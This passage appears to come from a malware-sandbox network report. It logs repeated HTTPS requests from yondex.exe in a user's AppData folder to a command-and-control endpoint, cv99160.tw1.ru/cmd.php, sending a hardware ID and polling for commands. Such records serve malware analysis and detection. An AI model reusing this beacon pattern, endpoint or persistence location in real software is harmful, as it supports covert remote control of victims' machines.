                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.4 | 49766 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:57 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:57 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=76d8eaaaeb562003de30c4bf08daa58e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:57 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.4 | 49767 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:58 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:58 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=61e510ebcd75a24f25acf8bf47177d17; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.4 | 49768 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:31:59 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:00 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=27df4d8c953d802bae13339e144b354a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:00 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              29 | 192.168.2.4 | 49769 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:00 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:01 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=868df4a8cf63074e3a021a1fa56f6178; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              30 | 192.168.2.4 | 49770 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:02 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:02 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=06601e1d060b0ca340949d0c219c243d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:02 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              31 | 192.168.2.4 | 49771 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:03 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:03 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fcf791a709f1de5c84a486dc0c552501; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              32 | 192.168.2.4 | 49772 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:04 UTC | 168 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:04 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=89fca66fb150b46e0d76eff81ea9d518; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:04 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              33 | 192.168.2.4 | 49773 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:05 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:05 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ddffc366ee96ecf1c340c678129dc348; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              34 | 192.168.2.4 | 49774 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:06 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:07 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9a87ff128ed3302af94e8eda0e0ebd88; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:07 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              35 | 192.168.2.4 | 49776 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:08 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:08 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=f2fad631763035d20f5f1e83e25cdcb2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              36 | 192.168.2.4 | 49777 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:09 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:09 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7ec285fc91bbaf066487ca07e31a92d5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:09 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              37 | 192.168.2.4 | 49778 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:10 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:10 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4abb93b651bc880cd4bbaae3d4db24e1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              38 | 192.168.2.4 | 49779 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:11 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:11 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9e992b4148c6f9d563d7769be7fc9b2b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:11 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              39 | 192.168.2.4 | 49780 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:12 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:13 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=f4b6cd3bc3efa7a422718064a031300e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              40 | 192.168.2.4 | 49781 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:13 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:14 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=97d1560391a7caf21e52ab3ee91e5247; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:14 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              41 | 192.168.2.4 | 49782 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:15 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:15 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=03e79e112c0df97fd0b54b8952794ab5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              42 | 192.168.2.4 | 49783 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:16 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:16 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5668431d74929336dd70898f05b1280e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:16 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              43 | 192.168.2.4 | 49784 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:17 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:17 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=052e76cf5d7e5eb090a4c29a2f4f1749; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              44 | 192.168.2.4 | 49785 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:18 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:18 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=70ca4ee15ba348f3c98f944b670b969a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:18 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              45 | 192.168.2.4 | 49786 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:20 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:20 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bfad6550a5b508598d0f3209998a4a35; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              46 | 192.168.2.4 | 49787 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:21 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:21 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=25e1ba12b2bed88b1144215eaedc86f9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:21 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              47 | 192.168.2.4 | 49788 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:22 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:22 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ec352d113a23119642ce53e40060507d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              48 | 192.168.2.4 | 49789 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:23 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:23 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7956af7202a59c64a63cd396514907ed; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:23 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              49 | 192.168.2.4 | 49790 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:24 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:25 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:25 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fe1ea6978ea228e6dbaf79ae3941647a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              50 | 192.168.2.4 | 49791 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:32:25 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:26 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=46a1afa8dae829b24fa2999e01ea93c2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49792 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:27 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
